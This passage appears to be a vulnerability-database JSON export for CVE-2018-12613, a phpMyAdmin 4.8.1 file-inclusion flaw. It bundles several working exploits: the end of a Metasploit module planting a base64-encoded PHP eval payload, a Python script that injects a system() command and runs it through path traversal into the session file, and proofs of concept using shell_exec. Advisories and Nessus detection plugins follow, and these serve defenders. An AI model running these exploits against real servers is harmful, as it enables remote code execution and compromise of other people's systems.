\nelsif login_check.body !~ /token\"\\s*value=\"(.*?)\"/ \nfail_with(Failure::NotFound, \"#{peer} - Couldn't find token. 
Is URI set correctly?\") \nend \ntoken = Rex::Text.html_decode($1) \n \nvprint_status(\"#{peer} - Authentication successful\") \n \n#Generating strings/payload \ndatabase = rand_text_alpha_lower(5) \ntable = rand_text_alpha_lower(5) \ncolumn = rand_text_alpha_lower(5) \ncol_val = \"'<?php eval(base64_decode(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\")); ?>'\" \n \n \n#Preparing sql queries \ndbsql = \"CREATE DATABASE #{database};\" \ntablesql = \"CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});\" \ndropsql = \"DROP DATABASE #{database};\" \ndirsql = 'SHOW VARIABLES WHERE Variable_Name Like \"%datadir\";' \n \n#Create database \nres = query(uri, dbsql, cookies, token) \nif res.nil? || res.code != 200 \nfail_with(Failure::UnexpectedReply, \"#{peer} - Failed to create database\") \nend \n \n#Create table and column \nres = query(uri, tablesql, cookies, token) \nif res.nil? || res.code != 200 \nfail_with(Failure::UnexpectedReply, \"#{peer} - Failed to create table\") \nend \n \n#Find datadir \nres = query(uri, dirsql, cookies, token) \nif res.nil? || res.code != 200 \nfail_with(Failure::UnexpectedReply, \"#{peer} - Failed to find data directory\") \nend \n \nunless res.body =~ /^<td data.*?>(.*)?</ \nfail_with(Failure::UnexpectedReply, \"#{peer} - Failed to find data directory\") \nend \n \n#Creating include path \nif mytarget == 'Windows' \n#Table file location \ndata_path = $1.gsub(/\\\\/, '/') \ndata_path = data_path.sub(/^.*?\\//, '/') \ndata_path << \"#{database}/#{table}.frm\" \nelse \n#Session path location \n/phpMyAdmin=(?<session_name>.*?);/ =~ cookies \ndata_path = \"/var/lib/php/sessions/sess_#{session_name}\" \nend \n \nres = lfi(uri, data_path, cookies, token) \n \n#Drop database \nres = query(uri, dropsql, cookies, token) \nif res.nil? || res.code != 200 \nprint_error(\"#{peer} - Failed to drop database #{database}. 
Might drop when your session closes.\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148534/phpmyadmin_lfi_rce.rb.txt"}, {"lastseen": "2021-10-25T17:34:29", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 4.8.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164623", "href": "https://packetstormsecurity.com/files/164623/phpMyAdmin-4.8.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE) \n# Date: 17/08/2021 \n# Exploit Author: samguy \n# Vulnerability Discovery By: ChaMd5 & Henry Huang \n# Vendor Homepage: http://www.phpmyadmin.net \n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz \n# Version: 4.8.1 \n# Tested on: Linux - Debian Buster (PHP 7.3) \n# CVE : CVE-2018-12613 \n \n#!/usr/bin/env python \n \nimport re, requests, sys \n \n# check python 
major version \nif sys.version_info.major == 3: \nimport html \nelse: \nfrom six.moves.html_parser import HTMLParser \nhtml = HTMLParser() \n \nif len(sys.argv) < 7: \nusage = \"\"\"Usage: {} [ipaddr] [port] [path] [username] [password] [command] \nExample: {} 192.168.56.65 8080 /phpmyadmin username password whoami\"\"\" \nprint(usage.format(sys.argv[0],sys.argv[0])) \nexit() \n \ndef get_token(content): \ns = re.search('token\"\\s*value=\"(.*?)\"', content) \ntoken = html.unescape(s.group(1)) \nreturn token \n \nipaddr = sys.argv[1] \nport = sys.argv[2] \npath = sys.argv[3] \nusername = sys.argv[4] \npassword = sys.argv[5] \ncommand = sys.argv[6] \n \nurl = \"http://{}:{}{}\".format(ipaddr,port,path) \n \n# 1st req: check login page and version \nurl1 = url + \"/index.php\" \nr = requests.get(url1) \ncontent = r.content.decode('utf-8') \nif r.status_code != 200: \nprint(\"Unable to find the version\") \nexit() \n \ns = re.search('PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"', content) \nversion = s.group(1) \nif version != \"4.8.0\" and version != \"4.8.1\": \nprint(\"The target is not exploitable\".format(version)) \nexit() \n \n# get 1st token and cookie \ncookies = r.cookies \ntoken = get_token(content) \n \n# 2nd req: login \np = {'token': token, 'pma_username': username, 'pma_password': password} \nr = requests.post(url1, cookies = cookies, data = p) \ncontent = r.content.decode('utf-8') \ns = re.search('logged_in:(\\w+),', content) \nlogged_in = s.group(1) \nif logged_in == \"false\": \nprint(\"Authentication failed\") \nexit() \n \n# get 2nd token and cookie \ncookies = r.cookies \ntoken = get_token(content) \n \n# 3rd req: execute query \nurl2 = url + \"/import.php\" \n# payload \npayload = '''select '<?php system(\"{}\") ?>';'''.format(command) \np = {'table':'', 'token': token, 'sql_query': payload } \nr = requests.post(url2, cookies = cookies, data = p) \nif r.status_code != 200: \nprint(\"Query failed\") \nexit() \n \n# 4th req: execute payload \nsession_id = 
cookies.get_dict()['phpMyAdmin'] \nurl3 = url + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}\".format(session_id) \nr = requests.get(url3, cookies = cookies) \nif r.status_code != 200: \nprint(\"Exploit failed\") \nexit() \n \n# get result \ncontent = r.content.decode('utf-8', errors=\"replace\") \ns = re.search(\"select '(.*?)\\n'\", content, re.DOTALL) \nif s != None: \nprint(s.group(1)) \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164623/phpmyadmin481-exec.txt"}, {"lastseen": "2018-06-23T09:28:55", "description": "", "cvss3": {}, "published": "2018-06-22T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 4.8.1 Code Execution / Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-22T00:00:00", "id": "PACKETSTORM:148283", "href": "https://packetstormsecurity.com/files/148283/phpMyAdmin-4.8.1-Code-Execution-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution \n# Date: 2018-06-21 \n# Exploit Author: VulnSpy \n# Vendor Homepage: http://www.phpmyadmin.net \n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz \n# Version: 4.8.0, 4.8.1 \n# Tested on: php7 mysql5 \n# CVE : CVE-2018-12613 \n \n1. Run SQL Query : select '<?php phpinfo();exit;?>' \n2. 
Include the session file : \nhttp://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148283/phpmyadmin4581-lfiexec.txt"}, {"lastseen": "2018-11-27T18:22:38", "description": "", "cvss3": {}, "published": "2018-11-27T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 4.8.1 Authenticated Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-11-27T00:00:00", "id": "PACKETSTORM:150466", "href": "https://packetstormsecurity.com/files/150466/phpMyAdmin-4.8.1-Authenticated-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion \n# Date: 27-11-2018 \n# Exploit Author: Lucian Ioan Nitescu \n# Contact: https://twitter.com/LucianNitescu \n# Webiste: https://nitesculucian.github.io \n# Vendor Homepage: https://www.phpmyadmin.net/ \n# Software Link: https://www.phpmyadmin.net/files/4.8.1/ \n# Version: 4.8.1 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2018-12613 \n \n# 1. Description: \n \n# An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication). \n \n# 2. 
Proof of Concept: \n \nimport requests \n \n# input the target \nVALID_PHPMYADMIN_URL = \"\" \n \n# input a valid session (After authentification) \nVALID_PHPMYADMIN_SESSION = \"\" \n \nburp0_url = VALID_PHPMYADMIN_URL + \"/import.php\" \nburp0_cookies = {\"phpMyAdmin\": VALID_PHPMYADMIN_SESSION, \"pma_lang\": \"en\", \"pmaUser-1\": \"%7B%22iv%22%3A%22N2lLHGoe2cuUN5uvAbz8ww%3D%3D%22%2C%22mac%22%3A%222b02670d8802823d99c3ccaf1f0ece9f2eb4c536%22%2C%22payload%22%3A%22mR69lSBATnU%2B%2Bs5jL0c3yw%3D%3D%22%7D\", \"pmaAuth-1\": \"%7B%22iv%22%3A%22xoIEoAgAvAxL%5C%2F%5C%2Fa3c0iX8Q%3D%3D%22%2C%22mac%22%3A%22243d87482efacdde27e3d2a6c6e85ae3b903af66%22%2C%22payload%22%3A%22yl27EG%5C%2FIUngUnyZIKNa8O45enMc8iZyHjFpLmiDkWSs%3D%22%7D\"} \nburp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Connection\": \"close\"} \nburp0_data={\"is_js_confirmed\": \"0\", \"token\": \"?[I568P@ei7B?OUd\", \"pos\": \"0\", \"goto\": \"server_sql.php\", \"message_to_show\": \"Your SQL query has been executed successfully.\", \"prev_sql_query\": '', \"sql_query\": \"select '<?php $output = shell_exec(\\\"ls -al; date; id;\\\");echo \\\"<pre>$output</pre>\\\";exit;?>'\", \"sql_delimiter\": \";\", \"show_query\": \"1\", \"fk_checks\": \"0\", \"fk_checks\": \"1\", \"SQL\": \"Go\", \"ajax_request\": \"true\", \"ajax_page_request\": \"true\", \"_nocache\": \"1543255823534938840\", \"token\": \"?[I568P@ei7B?OUd\"} \nrequests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) \n \nprint \"While autentificated:\" \n \nprint \"- Please check: \" + VALID_PHPMYADMIN_URL + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_\" + VALID_PHPMYADMIN_SESSION \n \nprint \"- Please check: \" + VALID_PHPMYADMIN_URL + 
\"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php5/sess_\" + VALID_PHPMYADMIN_SESSION \n \n# 3. Solution: \n \n# Upgrade to version 4.8.2 or above. \n`\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150466/phpmyadmin481auth-lfi.txt"}], "debiancve": [{"lastseen": "2023-06-23T14:40:27", "description": "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T20:29:00", "type": "debiancve", "title": "CVE-2018-12613", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-21T20:29:00", "id": "DEBIANCVE:CVE-2018-12613", "href": "https://security-tracker.debian.org/tracker/CVE-2018-12613", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:24:38", "description": "A local file inclusion vulnerability exists in phpMyAdmin. The vulnerability is due to improper sanitization of the request URI. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could lead to information disclosure.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-10-02T00:00:00", "type": "checkpoint_advisories", "title": "phpMyAdmin index.php Local File Inclusion (CVE-2018-12613)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2019-09-26T00:00:00", "id": "CPAI-2018-1087", "href": "", "cvss": {"score": 6.5, "vector": 
"AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T14:28:56", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is 4.8.x prior to 4.8.2. It is, therefore, affected by the file inclusion and remote code execution vulnerabilities\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-06-27T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.8.x < 4.8.2 Vulnerability (PMASA-2018-4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2018_4.NASL", "href": "https://www.tenable.com/plugins/nessus/110722", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110722);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-12613\");\n script_bugtraq_id(104532);\n\n script_name(english:\"phpMyAdmin 4.8.x < 4.8.2 Vulnerability (PMASA-2018-4)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nfile inclusion and remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin\napplication hosted on the remote web server is 4.8.x prior to\n4.8.2. 
It is, therefore, affected by the file inclusion and \nremote code execution vulnerabilities\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpmyadmin.net/security/PMASA-2018-4/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin version 4.8.2 or later.\nAlternatively, apply the patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-12613\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/27\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"phpMyAdmin\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE);\ndir = install['path'];\nurl = build_url(qs:dir, port:port);\nversion = install['version'];\n\nif (version =~ \"^4(\\.8)?$\") audit(AUDIT_VER_NOT_GRANULAR, appname, port, version);\nif (version !~ \"^4\\.8\\.[0-9]\") audit(AUDIT_WEB_APP_NOT_INST, appname + \" 4.8.x\", port);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.8.x < 4.8.2\ncut_off = '4.8.0';\nfixed_ver = '4.8.2';\nif (ver_compare(ver:version, minver:cut_off, fix:fixed_ver, regexes:re) == -1)\n{\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\n\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:14", "description": "This update for phpMyAdmin fixes multiple issues.\n\nSecurity issues fixed :\n\n - CVE-2018-12613: File inclusion and remote code execution attack (boo#1098751)\n\n - CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\nThis update to version 4.8.2 also contains 
number of upstream bug fixes and improvements.", "cvss3": {}, "published": "2018-06-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-2018-669)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12581", "CVE-2018-12613"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:phpmyadmin", "cpe:/o:novell:opensuse:15.0", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-669.NASL", "href": "https://www.tenable.com/plugins/nessus/110680", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-669.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110680);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-12581\", \"CVE-2018-12613\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-2018-669)\");\n script_summary(english:\"Check for the openSUSE-2018-669 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for phpMyAdmin fixes multiple issues.\n\nSecurity issues fixed :\n\n - CVE-2018-12613: File inclusion and remote code execution\n attack (boo#1098751)\n\n - CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\nThis update to version 4.8.2 also contains number of upstream bug\nfixes and improvements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098752\"\n );\n 
script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"phpMyAdmin-4.8.2-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"phpMyAdmin-4.8.2-15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:59", "description": "The phpMyAdmin development team reports : Summary XSS in Designer feature Description A Cross-Site Scripting vulnerability was found in the Designer feature, where an attacker can deliver a payload to a user through a specially crafted database name. Severity We consider this attack to be of moderate severity. 
Summary File inclusion and remote code execution attack Description A flaw has been discovered where an attacker can include (view and potentially execute) files on the server.\n\nThe vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages.\n\nAn attacker must be authenticated, except in these situations :\n\n- $cfg['AllowArbitraryServer'] = true: attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin\n\n- $cfg['ServerDefault'] = 0: this bypasses the login and runs the vulnerable code without any authentication Severity We consider this to be severe. Mitigation factor Configuring PHP with a restrictive `open_basedir` can greatly restrict an attacker's ability to view files on the server. Vulnerable systems should not be run with the phpMyAdmin directives $cfg['AllowArbitraryServer'] = true or $cfg['ServerDefault'] = 0", "cvss3": {}, "published": "2018-06-25T00:00:00", "type": "nessus", "title": "FreeBSD : phpmyadmin -- remote code inclusion and XSS scripting (17cb6ff3-7670-11e8-8854-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12581", "CVE-2018-12613"], "modified": "2021-05-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpmyadmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_17CB6FF3767011E888546805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/110675", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) 